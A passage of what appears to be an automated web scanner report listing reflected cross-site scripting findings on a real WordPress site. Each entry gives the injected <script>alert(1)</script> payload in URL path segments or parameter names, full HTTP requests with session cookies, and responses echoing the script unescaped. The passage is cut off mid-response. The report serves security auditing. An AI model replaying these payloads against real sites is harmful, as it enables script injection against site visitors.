Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:16:05 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:16:05 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: b7dcdde953d73819bf4a18c1ae16e6f1
Vary: User-Agent
Content-Length: 55461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49d550f<script>alert(1)</script>b00bae0de29 </strong>
...[SNIP]...

2.51. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 45df4<script>alert(1)</script>2f966fa6030 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49?45df4<script>alert(1)</script>2f966fa6030=1 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:28 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 55496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49?45df4<script>alert(1)</script>2f966fa6030=1 </strong>
...[SNIP]...

2.52. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-admin/css/colors-fresh.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6de6e<script>alert(1)</script>294e246263e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin6de6e<script>alert(1)</script>294e246263e/css/colors-fresh.css?ver=20100610 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:55 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admin6de6e<script>alert(1)</script>294e246263e/css/colors-fresh.css?ver=20100610 </strong>
...[SNIP]...

2.53. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-admin/css/colors-fresh.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9fc92<script>alert(1)</script>085ff8a812c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css9fc92<script>alert(1)</script>085ff8a812c/colors-fresh.css?ver=20100610 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:09 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admin/css9fc92<script>alert(1)</script>085ff8a812c/colors-fresh.css?ver=20100610 </strong>
...[SNIP]...

2.54. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-admin/css/colors-fresh.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8ebcd<script>alert(1)</script>46ec459dc7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css/colors-fresh.css8ebcd<script>alert(1)</script>46ec459dc7a?ver=20100610 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:23 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admin/css/colors-fresh.css8ebcd<script>alert(1)</script>46ec459dc7a?ver=20100610 </strong>
...[SNIP]...

2.55. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-admin/css/login.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5c5f<script>alert(1)</script>7b5a1b70079 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admina5c5f<script>alert(1)</script>7b5a1b70079/css/login.css?ver=20100601 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:53 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admina5c5f<script>alert(1)</script>7b5a1b70079/css/login.css?ver=20100601 </strong>
...[SNIP]...

2.56. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-admin/css/login.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7f7a5<script>alert(1)</script>9b0dedc91ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css7f7a5<script>alert(1)</script>9b0dedc91ce/login.css?ver=20100601 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:20 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admin/css7f7a5<script>alert(1)</script>9b0dedc91ce/login.css?ver=20100601 </strong>
...[SNIP]...

2.57. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-admin/css/login.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b7ff7<script>alert(1)</script>8a49ffa7eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css/login.cssb7ff7<script>alert(1)</script>8a49ffa7eb?ver=20100601 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:36 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admin/css/login.cssb7ff7<script>alert(1)</script>8a49ffa7eb?ver=20100601 </strong>
...[SNIP]...

2.58. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a584d<script>alert(1)</script>8a64675d152 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contenta584d<script>alert(1)</script>8a64675d152/plugins/wp-polls/polls-css.css?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:37 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-contenta584d<script>alert(1)</script>8a64675d152/plugins/wp-polls/polls-css.css?ver=2.50 </strong>
...[SNIP]...

2.59. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc0a9<script>alert(1)</script>7d968794e31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsfc0a9<script>alert(1)</script>7d968794e31/wp-polls/polls-css.css?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:49 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/pluginsfc0a9<script>alert(1)</script>7d968794e31/wp-polls/polls-css.css?ver=2.50 </strong>
...[SNIP]...

2.60. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d2e41<script>alert(1)</script>dc6b1b1a6cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-pollsd2e41<script>alert(1)</script>dc6b1b1a6cd/polls-css.css?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:09 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:07 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins/wp-pollsd2e41<script>alert(1)</script>dc6b1b1a6cd/polls-css.css?ver=2.50 </strong>
...[SNIP]...

2.61. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a5199<script>alert(1)</script>a2929eae7fc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls/polls-css.cssa5199<script>alert(1)</script>a2929eae7fc?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:28 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.cssa5199<script>alert(1)</script>a2929eae7fc?ver=2.50 </strong>
...[SNIP]...

2.62. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9ee77<script>alert(1)</script>7cc8e94ec7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content9ee77<script>alert(1)</script>7cc8e94ec7d/plugins/wp-polls/polls-js.js?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:44 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content9ee77<script>alert(1)</script>7cc8e94ec7d/plugins/wp-polls/polls-js.js?ver=2.50 </strong>
...[SNIP]...

2.63. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1dbff<script>alert(1)</script>b6d08d9390f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins1dbff<script>alert(1)</script>b6d08d9390f/wp-polls/polls-js.js?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:05 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
